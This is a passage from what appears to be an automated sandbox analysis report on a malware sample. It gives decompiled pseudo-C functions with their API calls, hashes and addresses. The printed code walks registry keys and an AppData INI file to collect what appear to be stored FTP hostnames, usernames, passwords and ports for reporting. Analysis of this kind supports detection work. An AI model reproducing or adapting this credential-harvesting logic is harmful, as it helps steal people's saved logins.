											_t211 = E0041787A( &_v36, _t234, __eflags,  *((intOrPtr*)(_t239 + 0x40)), _v16, 0x40000000);
											_v40 = _t211;
											__eflags = _t211;
											if(_t211 == 0) {
												L54:
												E00411CFE(_t211);
												E0041BF13( &_v60);
												_t239 = _a4;
												E0041BF3C( *(_t239 + 0x3c),  *((intOrPtr*)(_a4 + 0x38)));
												_t122 = _t239 + 0x3c;
												 *_t122 =  *(_t239 + 0x3c) & 0x00000000;
												__eflags =  *_t122;
												goto L55;
											}
											_t176 = E00417F4C(_t211, _v36);
											__eflags = _t176;
											if(_t176 == 0) {
												goto L54;
											}
											_t177 = E00411C89(( *(_t239 + 0x3c) + 1) * 0x1c, _t239 + 0x38);
											__eflags = _t177;
											if(_t177 == 0) {
												goto L54;
											}
											 *(_a4 + 0x3c) =  *(_a4 + 0x3c) + 1;
											E00411D3A( *(_a4 + 0x3c) * 0x1c +  *((intOrPtr*)(_t178 + 0x38)),  &_v60, 0x1c);
											goto L47;
										}
									}
									__eflags =  *(_t238 + 0xc);
									if( *(_t238 + 0xc) <= 0) {
										goto L31;
									}
									E0041CDE0( &_v184, _t220, 1,  &_v288);
									_t186 = E00412FA3( &_v112, ( *(_t238 + 0xc) & 0x0000ffff) + _t238, E0041283B(( *(_t238 + 0xc) & 0x0000ffff) + _t238));
									__eflags = _t186;
									if(_t186 == 0) {
										goto L48;
									}
									_t230 =  &_v184;
									_t212 = 0;
									__eflags = 0;
									do {
										E00412066( *((intOrPtr*)(_t244 + _t212 - 0x6c)), _t230);
										_t212 = _t212 + 1;
										_t230 = _t230 + 4;
										__eflags = _t212 - 0x10;
									} while (_t212 < 0x10);
									_v32 = _v32 | 0xffffffff;
									_t208 = 0x10;
									 *_t230 = 0;
									_v24 = _t208;
									_v20 = 0x80000001;
									_t191 = RegOpenKeyExW(0x80000001,  &_v288, 0, 1,  &_v20);
									__eflags = _t191;
									if(_t191 != 0) {
										goto L31;
									}
									_t195 = RegQueryValueExW(_v20,  &_v184, 0, 0,  &_v80,  &_v24);
									__eflags = _t195;
									if(_t195 == 0) {
										_v32 = _v24;
									}
									RegCloseKey(_v20);
									__eflags = _v32 - _t208;
									if(_v32 == _t208) {
										GetLocalTime( &_v96);
										__eflags = _v74 - _v96.wDay;
										if(_v74 != _v96.wDay) {
											goto L31;
										}
										__eflags = _v78 - _v96.wMonth;
										if(_v78 == _v96.wMonth) {
											goto L48;
										}
									}
									goto L31;
								}
								_t220 = _t238 + _t143;
								_t201 = E0041AD0E(_t238 + _t143,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
								__eflags = _t201;
								if(_t201 == 0) {
									goto L48;
								}
								goto L20;
							}
							_t220 = _t238 + _t142;
							_t202 = E0041AD0E(_t238 + _t142,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
							__eflags = _t202 - 1;
							if(_t202 == 1) {
								goto L48;
							}
							goto L18;
						}
						_t203 = E0041AF94(_t220, _t234, __eflags, 4, _t141,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)), _t208);
						__eflags = _t203;
						if(_t203 != 0) {
							goto L48;
						}
						goto L16;
					}
					goto L55;
				}
				return 0;
			}

0x0041b007
0x0041b00a
0x0041b010
0x0041b027
0x0041b02c
0x0041b030
0x0041b034
0x0041b036
0x0041b039
0x0041b03b
0x0041b39e
0x0041b3a1
0x0041b3a8
0x0041b3ab
0x00000000
0x0041b3ad
0x0041b041
0x0041b044
0x0041b047
0x00000000
0x00000000
0x0041b04f
0x0041b053
0x0041b067
0x0041b067
0x0041b069
0x0041b06c
0x0041b06f
0x0041b06f
0x0041b073
0x0041b076
0x00000000
0x00000000
0x0041b07c
0x0041b080
0x0041b083
0x00000000
0x00000000
0x0041b089
0x0041b08d
0x00000000
0x00000000
0x0041b093
0x0041b097
0x00000000
0x00000000
0x0041b09d
0x0041b0a1
0x00000000
0x00000000
0x0041b0a7
0x0041b0ab
0x00000000
0x00000000
0x0041b0b1
0x0041b0b5
0x00000000
0x00000000
0x0041b0bb
0x0041b0c6
0x0041b0c9
0x0041b0cc
0x0041b0d0
0x0041b328
0x0041b32c
0x0041b32e
0x0041b331
0x0041b334
0x00000000
0x00000000
0x0041b33c
0x0041b33f
0x00000000
0x00000000
0x0041b341
0x00000000
0x0041b341
0x0041b0d9
0x0041b0de
0x0041b0e3
0x0041b0e5
0x00000000
0x00000000
0x0041b0eb
0x0041b0ee
0x0041b0f0
0x0041b109
0x0041b109
0x0041b10d
0x0041b110
0x0041b128
0x0041b128
0x0041b12c
0x0041b12f
0x0041b147
0x0041b147
0x0041b14a
0x0041b22e
0x0041b236
0x0041b23e
0x0041b248
0x0041b252
0x0041b255
0x0041b259
0x0041b25c
0x0041b264
0x0041b26e
0x0041b25e
0x0041b25e
0x0041b25e
0x0041b271
0x0041b275
0x0041b278
0x0041b280
0x0041b28a
0x0041b27a
0x0041b27a
0x0041b27a
0x0041b28d
0x0041b291
0x0041b294
0x0041b29c
0x0041b2a6
0x0041b296
0x0041b296
0x0041b296
0x0041b2a9
0x0041b2ac
0x0041b2ae
0x0041b34f
0x0041b354
0x0041b35e
0x0041b363
0x0041b366
0x0041b368
0x0041b372
0x0041b377
0x0041b36a
0x0041b36a
0x0041b36a
0x00000000
0x0041b2b4
0x0041b2b4
0x0041b2b6
0x0041b320
0x0041b325
0x0041b325
0x00000000
0x0041b325
0x0041b2cb
0x0041b2cd
0x0041b2d0
0x0041b2d2
0x0041b37c
0x0041b37d
0x0041b385
0x0041b390
0x0041b395
0x0041b39a
0x0041b39a
0x0041b39a
0x00000000
0x0041b39a
0x0041b2dd
0x0041b2e2
0x0041b2e4
0x00000000
0x00000000
0x0041b2f4
0x0041b2f9
0x0041b2fb
0x00000000
0x00000000
0x0041b30c
0x0041b316
0x00000000
0x0041b316
0x0041b2ae
0x0041b150
0x0041b155
0x00000000
0x00000000
0x0041b16a
0x0041b180
0x0041b185
0x0041b187
0x00000000
0x00000000
0x0041b18d
0x0041b193
0x0041b193
0x0041b195
0x0041b199
0x0041b19e
0x0041b19f
0x0041b1a2
0x0041b1a2
0x0041b1a7
0x0041b1ad
0x0041b1b0
0x0041b1c8
0x0041b1cb
0x0041b1ce
0x0041b1d4
0x0041b1d6
0x00000000
0x00000000
0x0041b1ee
0x0041b1f4
0x0041b1f6
0x0041b1fb
0x0041b1fb
0x0041b201
0x0041b207
0x0041b20a
0x0041b210
0x0041b21a
0x0041b21e
0x00000000
0x00000000
0x0041b224
0x0041b228
0x00000000
0x00000000
0x0041b228
0x00000000
0x0041b20a
0x0041b134
0x0041b13a
0x0041b13f
0x0041b141
0x00000000
0x00000000
0x00000000
0x0041b141
0x0041b115
0x0041b11b
0x0041b120
0x0041b122
0x00000000
0x00000000
0x00000000
0x0041b122
0x0041b0fc
0x0041b101
0x0041b103
0x00000000
0x00000000
0x00000000
0x0041b103
0x00000000
0x0041b06f
0x00000000

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 509d16b84c786ff78fe6fb62e0c80fc8915daf7d3af721bdc1899fa0f5e6883b
Instruction ID: 752b20fcf7690d42cce6e4b81d486e263f1a7a1ca85bc05596991188f31d2b8c
Opcode Fuzzy Hash: 509d16b84c786ff78fe6fb62e0c80fc8915daf7d3af721bdc1899fa0f5e6883b
Instruction Fuzzy Hash: 2FB1A171900219AACB20EF95CC41BFEB7B4FF04304F40455AF961E6691E778E9D5CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A207, Relevance: 6.2, APIs: 4, Instructions: 184
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040A207(char* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				char _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v68;
				char _v88;
				char _v108;
				char _v132;
				char _v172;
				short _v260;
				short _v780;
				void* __edi;
				void* __esi;
				intOrPtr _t65;
				intOrPtr _t92;
				int _t104;
				void* _t110;
				intOrPtr _t112;
				void* _t115;
				int _t120;
				void* _t125;
				void* _t132;
				void* _t135;
				void* _t136;

				_t119 = __edx;
				_t118 = __ecx;
				_t120 = 0;
				E00411DB1( &_v32,  &_v32, 0, 8);
				_t65 = E00411CCE(0xc1c);
				_v16 = _t65;
				if(_t65 == 0) {
					L22:
					if(_v28 <= _t120) {
						return E00411CFE(_v32);
					}
					return E00407DEB(_t119, _v32, 0xcb);
				} else {
					_v36 = _t65 + 0x3fc;
					_v48 = 0x80000001;
					_v44 = 0x80000002;
					E00419897(0x8a,  &_v260);
					E00419897(0x8b,  &_v88);
					E00419897(0x8c,  &_v132);
					E00419897(0x8d,  &_v68);
					E00419897(0x8e,  &_v108);
					_v12 = 0;
					do {
						if(RegOpenKeyExW( *(_t135 + _v12 * 4 - 0x2c),  &_v260, _t120, 8,  &_v8) != 0) {
							goto L20;
						}
						_v24 = _t120;
						_v20 = 0x104;
						if(RegEnumKeyExW(_v8, _t120,  &_v780,  &_v20, _t120, _t120, _t120, _t120) != 0) {
							L19:
							RegCloseKey(_v8);
							goto L20;
						} else {
							goto L4;
						}
						L17:
						_v20 = 0x104;
						if(RegEnumKeyExW(_v8, _v24,  &_v780,  &_v20, 0, 0, 0, 0) == 0) {
							L4:
							_t122 = _v16;
							_v24 = _v24 + 1;
							_t92 = E00415E26(_v8, _t118, _v16,  &_v780,  &_v88, 0xff);
							_v40 = _t92;
							if(_t92 != 0xffffffff && _t92 != 0) {
								_t132 = E00415E26(_v8, _t118, _t122 + 0x1fe,  &_v780,  &_v68, 0xff);
								if(_t132 != 0xffffffff && _t132 != 0) {
									_t124 = _v36;
									_t104 = E00415E26(_v8, _t118, _v36,  &_v780,  &_v108, 0xff);
									_v20 = _t104;
									if(_t104 != 0xffffffff && _t104 != 0 && E0040A14D(_t119, _t124, _t132 + _v40) > 0) {
										_t125 = E00415EDC(_v8, _t118,  &_v780,  &_v132);
										if(_t125 < 1 || _t125 > 0xffff) {
											_t125 = 0x15;
										}
										_t134 =  &_v172;
										_t110 = 0x55;
										E00419897(_t110,  &_v172);
										_t112 = _v16;
										_t118 = _v36;
										_push(_t125);
										_push(_t112);
										_push(_t118);
										_push(_t112 + 0x1fe);
										_t119 = 0x311;
										_t126 = _t118 + 0x1fe;
										_t115 = E004129F1(_t134, 0x311, _t118 + 0x1fe, _t134);
										_t136 = _t136 + 0x14;
										if(_t115 > 0) {
											_t118 =  &_v32;
											if(E004120F2(_t115,  &_v32, _t126) != 0) {
												_v28 = _v28 + 1;
											}
										}
									}
								}
							}
							goto L17;
						} else {
							_t120 = 0;
							goto L19;
						}
						L20:
						_v12 = _v12 + 1;
					} while (_v12 < 2);
					E00411CFE(_v16);
					goto L22;
				}
			}

0x0040a207
0x0040a207
0x0040a215
0x0040a21c
0x0040a226
0x0040a22b
0x0040a230
0x0040a429
0x0040a42c
0x00000000
0x0040a445
0x00000000
0x0040a236
0x0040a23b
0x0040a249
0x0040a250
0x0040a257
0x0040a264
0x0040a271
0x0040a27e
0x0040a28b
0x0040a290
0x0040a298
0x0040a2b5
0x00000000
0x00000000
0x0040a2ce
0x0040a2d1
0x0040a2e0
0x0040a40b
0x0040a40e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a3dd
0x0040a3f1
0x0040a403
0x0040a2e6
0x0040a2e6
0x0040a2e9
0x0040a2fb
0x0040a300
0x0040a306
0x0040a32e
0x0040a333
0x0040a341
0x0040a353
0x0040a358
0x0040a35e
0x0040a384
0x0040a389
0x0040a395
0x0040a395
0x0040a398
0x0040a39e
0x0040a39f
0x0040a3a4
0x0040a3a7
0x0040a3aa
0x0040a3ab
0x0040a3ac
0x0040a3b2
0x0040a3b6
0x0040a3bb
0x0040a3c1
0x0040a3c6
0x0040a3cb
0x0040a3ce
0x0040a3d8
0x0040a3da
0x0040a3da
0x0040a3d8
0x0040a3cb
0x0040a35e
0x0040a333
0x00000000
0x0040a409
0x0040a409
0x00000000
0x0040a409
0x0040a414
0x0040a414
0x0040a417
0x0040a424
0x00000000
0x0040a424

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 0040A2AD
RegEnumKeyExW.ADVAPI32 ref: 0040A2D8
RegCloseKey.ADVAPI32(?), ref: 0040A40E

Part of subcall function 00415E26: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D7E1,?,?,00000104,.exe,00000000), ref: 00415E3B

RegEnumKeyExW.ADVAPI32 ref: 0040A3FB

Part of subcall function 00415E26: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0041D7E1,?,?,00000104), ref: 00415EBC

Part of subcall function 00415EDC: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0040E0D2,?,?), ref: 00415EF4

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: 026c56769e706e2c5b252c686298eb3ea189268175a0d9b506bce6560cbcaea2
Instruction ID: 65d8f4d98ff6e587a924e3664aaa96960ddf4627192584194a5b697d49cc6222
Opcode Fuzzy Hash: 026c56769e706e2c5b252c686298eb3ea189268175a0d9b506bce6560cbcaea2
Instruction Fuzzy Hash: 1A516D72D00218ABDB11EBA5DD45AEFB7BCEF44304F10017AE905F3291DB789E858B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A79B, Relevance: 6.2, APIs: 4, Instructions: 176
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040A79B(char* __ecx, void* __eflags) {
				void* _v8;
				int _v12;
				intOrPtr _v16;
				int* _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				char _v40;
				char _v52;
				char _v64;
				char _v76;
				char _v116;
				short _v180;
				short _v700;
				void* __edi;
				void* __esi;
				intOrPtr _t55;
				int _t81;
				int _t89;
				int _t93;
				void* _t99;
				intOrPtr _t101;
				void* _t104;
				int* _t109;
				char* _t113;
				void* _t114;
				void* _t122;

				_t107 = __ecx;
				_t109 = 0;
				E00411DB1( &_v28,  &_v28, 0, 8);
				_t55 = E00411CCE(0xc1c);
				_v16 = _t55;
				if(_t55 == 0) {
					return _t55;
				}
				_v32 = _t55 + 0x3fc;
				E00419897(0x97,  &_v180);
				E00419897(0x98,  &_v64);
				E00419897(0x99,  &_v76);
				E00419897(0x9a,  &_v52);
				E00419897(0x9b,  &_v40);
				if(RegOpenKeyExW(0x80000001,  &_v180, 0, 8,  &_v8) != 0) {
					L20:
					E00411CFE(_v16);
					if(_v24 <= _t109) {
						return E00411CFE(_v28);
					}
					return E00407DEB(0x311, _v28, 0xcb);
				}
				_v20 = 0;
				_v12 = 0x104;
				if(RegEnumKeyExW(_v8, 0,  &_v700,  &_v12, 0, 0, 0, 0) != 0) {
					L19:
					RegCloseKey(_v8);
					goto L20;
				} else {
					do {
						_t111 = _v16;
						_v20 = _v20 + 1;
						_t81 = E00415E26(_v8, _t107, _v16,  &_v700,  &_v64, 0xff);
						_v12 = _t81;
						if(_t81 != 0xffffffff && _t81 != 0) {
							_t89 = E00415E26(_v8, _t107, _t111 + 0x1fe,  &_v700,  &_v52, 0xff);
							_v12 = _t89;
							if(_t89 != 0xffffffff && _t89 != 0) {
								_t113 = _v32;
								_t93 = E00415E26(_v8, _t107, _t113,  &_v700,  &_v40, 0xff);
								_v12 = _t93;
								if(_t93 != 0xffffffff && _t93 != 0) {
									_t107 = _t113;
									if(E0041284D(_t113) > 0) {
										_t114 = E00415EDC(_v8, _t107,  &_v700,  &_v76);
										if(_t114 < 1 || _t114 > 0xffff) {
											_t114 = 0x15;
										}
										_t121 =  &_v116;
										_t99 = 0x55;
										E00419897(_t99,  &_v116);
										_t101 = _v16;
										_t107 = _v32;
										_push(_t114);
										_push(_t101);
										_push(_t107);
										_push(_t101 + 0x1fe);
										_t115 = _t107 + 0x1fe;
										_t104 = E004129F1(_t121, 0x311, _t107 + 0x1fe, _t121);
										_t122 = _t122 + 0x14;
										if(_t104 > 0) {
											_t107 =  &_v28;
											if(E004120F2(_t104,  &_v28, _t115) != 0) {
												_v24 = _v24 + 1;
											}
										}
									}
								}
							}
						}
						_v12 = 0x104;
					} while (RegEnumKeyExW(_v8, _v20,  &_v700,  &_v12, 0, 0, 0, 0) == 0);
					_t109 = 0;
					goto L19;
				}
			}

0x0040a79b
0x0040a7a9
0x0040a7b0
0x0040a7ba
0x0040a7bf
0x0040a7c4
0x0040a9be
0x0040a9be
0x0040a7cf
0x0040a7dd
0x0040a7ea
0x0040a7f7
0x0040a804
0x0040a811
0x0040a831
0x0040a991
0x0040a994
0x0040a99c
0x00000000
0x0040a9b5
0x00000000
0x0040a9ab
0x0040a84a
0x0040a84d
0x0040a85c
0x0040a988
0x0040a98b
0x00000000
0x0040a862
0x0040a867
0x0040a867
0x0040a86a
0x0040a87c
0x0040a881
0x0040a887
0x0040a8aa
0x0040a8af
0x0040a8b5
0x0040a8c3
0x0040a8d5
0x0040a8da
0x0040a8e0
0x0040a8e6
0x0040a8ef
0x0040a904
0x0040a909
0x0040a915
0x0040a915
0x0040a918
0x0040a91b
0x0040a91c
0x0040a921
0x0040a924
0x0040a927
0x0040a928
0x0040a929
0x0040a92f
0x0040a938
0x0040a93e
0x0040a943
0x0040a948
0x0040a94b
0x0040a955
0x0040a957
0x0040a957
0x0040a955
0x0040a948
0x0040a8ef
0x0040a8e0
0x0040a8b5
0x0040a96e
0x0040a97e
0x0040a986
0x00000000
0x0040a986

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,00000008,?,?,00000000,00000008), ref: 0040A829
RegEnumKeyExW.ADVAPI32 ref: 0040A854
RegCloseKey.ADVAPI32(?), ref: 0040A98B

Part of subcall function 00415E26: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D7E1,?,?,00000104,.exe,00000000), ref: 00415E3B

RegEnumKeyExW.ADVAPI32 ref: 0040A978

Part of subcall function 00415E26: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0041D7E1,?,?,00000104), ref: 00415EBC

Part of subcall function 00415EDC: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0040E0D2,?,?), ref: 00415EF4

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: 3d27843492d9b5d17fb572f72e15994caae7e93853112907e98e913cd83baa26
Instruction ID: a3e1b024a66d4833fbba4adc0a1bbc47c41d42d1ba9eb757639a0d01d0f76559
Opcode Fuzzy Hash: 3d27843492d9b5d17fb572f72e15994caae7e93853112907e98e913cd83baa26
Instruction Fuzzy Hash: 325131B2E00209ABDB10ABA5CD45AEFBBBCEF44304F11057AB505F3291D7349E958B65

Uniqueness

Uniqueness Score: -1.00%

Function 0040EFFA, Relevance: 6.1, APIs: 4, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040EFFA(void* __eflags, intOrPtr _a4) {
				signed int _v5;
				short _v20;
				char _v40;
				char _v60;
				short _v84;
				char _v112;
				char _v144;
				short _v664;
				char _v1184;
				short _v1704;
				char _v2224;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t31;
				long _t33;
				void* _t36;
				void* _t42;
				void* _t44;
				void* _t46;
				long _t50;
				short* _t58;
				char* _t65;
				short _t66;
				void* _t67;
				WCHAR* _t70;
				long _t77;

				_t31 = 0x2a;
				E00419897(_t31,  &_v144);
				_t33 =  &_v1184;
				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t33);
				if(_t33 == 0) {
					_t33 = E00417593( &_v144,  &_v1184,  &_v1184);
					if(_t33 != 0) {
						_t36 = 0x2c;
						E00419897(_t36,  &_v112);
						_t33 = E00417593( &_v112,  &_v1704,  &_v1184);
						if(_t33 != 0) {
							_t33 = GetFileAttributesW( &_v1704);
							if(_t33 != 0xffffffff) {
								_t42 = 0x2d;
								E00419897(_t42,  &_v60);
								_t44 = 0x2e;
								E00419897(_t44,  &_v84);
								_t46 = 0x2f;
								E00419897(_t46,  &_v20);
								_v5 = 0;
								while(1) {
									_push(_v5 & 0x000000ff);
									_push( &_v60);
									_t67 = 0xa;
									_t70 =  &_v40;
									_t50 = E004129F1( &_v60, _t67, _t70);
									if(_t50 < 1) {
										break;
									}
									_t50 = GetPrivateProfileIntW(_t70,  &_v84, 0xffffffff,  &_v1704);
									_t77 = _t50;
									if(_t77 == 0xffffffff) {
										break;
									}
									_t50 = GetPrivateProfileStringW(_t70,  &_v20, 0,  &_v664, 0x104,  &_v1704);
									if(_t50 == 0) {
										L17:
										_v5 = _v5 + 1;
										if(_v5 < 0xfa) {
											continue;
										}
										break;
									}
									_t58 =  &_v664;
									if(_v664 == 0) {
										L12:
										if(_t77 != 1) {
											_t65 =  &_v664;
											L16:
											_t50 = E0040F181(0, _t65, _a4, _t90);
											if(_t50 == 0) {
												break;
											}
											goto L17;
										}
										_t50 = E00417593( &_v664,  &_v2224,  &_v1184);
										_t90 = _t50;
										if(_t50 == 0) {
											goto L17;
										}
										_t65 =  &_v2224;
										goto L16;
									} else {
										goto L9;
									}
									do {
										L9:
										if( *_t58 == 0x2f) {
											_t66 = 0x5c;
											 *_t58 = _t66;
										}
										_t58 = _t58 + 2;
									} while ( *_t58 != 0);
									goto L12;
								}
								return _t50;
							}
						}
					}
				}
				return _t33;
			}

0x0040f00d
0x0040f00e
0x0040f013
0x0040f021
0x0040f029
0x0040f039
0x0040f040
0x0040f04b
0x0040f04c
0x0040f061
0x0040f068
0x0040f075
0x0040f07e
0x0040f089
0x0040f08a
0x0040f094
0x0040f095
0x0040f09f
0x0040f0a0
0x0040f0a5
0x0040f0a9
0x0040f0ad
0x0040f0b1
0x0040f0b4
0x0040f0b5
0x0040f0b8
0x0040f0c2
0x00000000
0x00000000
0x0040f0d8
0x0040f0de
0x0040f0e3
0x00000000
0x00000000
0x0040f104
0x0040f10c
0x0040f16d
0x0040f16d
0x0040f174
0x00000000
0x00000000
0x00000000
0x0040f174
0x0040f10e
0x0040f11b
0x0040f131
0x0040f134
0x0040f15b
0x0040f161
0x0040f164
0x0040f16b
0x00000000
0x00000000
0x00000000
0x0040f16b
0x0040f14a
0x0040f14f
0x0040f151
0x00000000
0x00000000
0x0040f153
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f11d
0x0040f11d
0x0040f121
0x0040f125
0x0040f126
0x0040f126
0x0040f129
0x0040f12c
0x00000000
0x0040f11d
0x00000000
0x0040f17a
0x0040f07e
0x0040f068
0x0040f040
0x0040f17e

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 0040F021

Part of subcall function 00417593: PathCombineW.SHLWAPI(0041C47F,0041C47F,?,0041C47F,?,?), ref: 004175B2

GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0040F075
GetPrivateProfileIntW.KERNEL32 ref: 0040F0D8
GetPrivateProfileStringW.KERNEL32 ref: 0040F104

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: PathPrivateProfile$AttributesCombineFileFolderString
String ID:
API String ID: 1702184609-0
Opcode ID: 525e73140843efe44c2258624908c0112321cc801af889f4f02a6cbb45d57449
Instruction ID: b5dc4d3ecca20331a5fa833f2d83eafdec50c2342f6b4401e5cf8c1e226c71d5
Opcode Fuzzy Hash: 525e73140843efe44c2258624908c0112321cc801af889f4f02a6cbb45d57449
Instruction Fuzzy Hash: E8418F72A00218AADF20EAA4DC45EDF777CAB45314F0005B7F548FB1D1D7789E898A58

Uniqueness

Uniqueness Score: -1.00%

Function 004181A1, Relevance: 6.1, APIs: 4, Instructions: 86comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004015B0,00000000,00004401,004015A0,?,?,?,?,?,?,?,?,?,0040873D,?,?), ref: 004181C7
#8.OLEAUT32(?,?,?,?,?,?,?,?,?,0040873D,?,?), ref: 00418213
#2.WS2_32(?,?,?,?,?,?,?,?,?,0040873D,?,?), ref: 00418223
#9.OLEAUT32(?,?,?,?,?,?,?,?,?,?,0040873D,?,?), ref: 0041825C

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
Instruction ID: c29562c6fbf516a1048cc6eb384817298c08faf3d7c49e293bf34a62fde5a1e6
Opcode Fuzzy Hash: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
Instruction Fuzzy Hash: 8F218571900614AFCB11DBA5CCCCEEF7BB8EF0A750F1006A5F906EB251D6759940CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00417CC5, Relevance: 6.1, APIs: 4, Instructions: 84
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417CC5(signed int __edx, void** __esi, void* _a4, signed int _a8) {
				char _v5;
				long _v12;
				void _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t26;
				signed int _t29;
				signed int _t46;
				void** _t48;

				_t48 = __esi;
				_t46 = __edx;
				_v5 = 0;
				if(_a8 <= 0xa00000) {
					_t26 = E0041700D( *__esi);
					_v36 = _t26;
					_v32 = _t46;
					if((_t26 & _t46) != 0xffffffff && E00416FED( *__esi, 0, 0, 2) != 0) {
						_t29 = E0041700D( *__esi);
						_v28 = _t29;
						_v24 = _t46;
						if((_t29 & _t46) != 0xffffffff) {
							E00411DB1( &_v20,  &_v20, 0, 5);
							_v20 = __esi[4] ^ _a8;
							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, _a8,  &_v12, 0) == 0 || _v12 != _a8) {
								E00416FED( *_t48, _v28, _v24, 0);
								SetEndOfFile( *_t48);
							} else {
								_v5 = 1;
							}
						}
						FlushFileBuffers( *_t48);
						E00416FED( *_t48, _v36, _v32, 0);
					}
				}
				return _v5;
			}

0x00417cc5
0x00417cc5
0x00417cd6
0x00417cd9
0x00417ce1
0x00417ce6
0x00417ceb
0x00417cf1
0x00417d0c
0x00417d11
0x00417d16
0x00417d1c
0x00417d25
0x00417d37
0x00417d4a
0x00417d7c
0x00417d83
0x00417d6d
0x00417d6d
0x00417d6d
0x00417d4a
0x00417d8b
0x00417d9a
0x00417d9a
0x00417cf1
0x00417da5

APIs

Part of subcall function 0041700D: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,00000000,00000000), ref: 00417022

Part of subcall function 00416FED: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00417C9E,?,00000000,00000000,00000000,00000000), ref: 00416FFF

WriteFile.KERNEL32(?,?,00000005,00000000,00000000,?,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 00417D46
WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 00417D5F
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00417D83
FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 00417D8B

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: File$PointerWrite$BuffersFlush
String ID:
API String ID: 1289656144-0
Opcode ID: f7fbc59b6b90ab0a214ec322655bb0973e4cac2b87adba9fbe0841b9a5ffe174
Instruction ID: e2b55f125aa1174b5332cf67c956d17a8ba289089a33faf87ad9ed1c416d1d8b
Opcode Fuzzy Hash: f7fbc59b6b90ab0a214ec322655bb0973e4cac2b87adba9fbe0841b9a5ffe174
Instruction Fuzzy Hash: F9318E7680420DEFDF119FA4DC41EEEBBB9BF08348F14452AF190A1164D73A8995DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00406D5A, Relevance: 6.1, APIs: 4, Instructions: 69
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406D5A(void* __ebx, void* __ecx) {
				char _v20;
				char* _v84;
				char _v92;
				char _v196;
				char _v716;
				void* __edi;
				void* __esi;
				void* _t15;
				void* _t31;
				void* _t35;
				void* _t36;
				char _t37;
				void** _t43;

				_t36 = __ecx;
				_t35 = __ebx;
				_t15 =  *(__ebx + 0x180);
				if(_t15 == 0 || WaitForSingleObject(_t15, 0) != 0x102) {
					_t43 = _t35 + 0x17c;
					E0041370D(_t43);
					E0041CD51(_t36,  &_v716, _t43, 1);
					E0041C9FB(0x2937498d,  &_v196, 0);
					_t37 = 0x44;
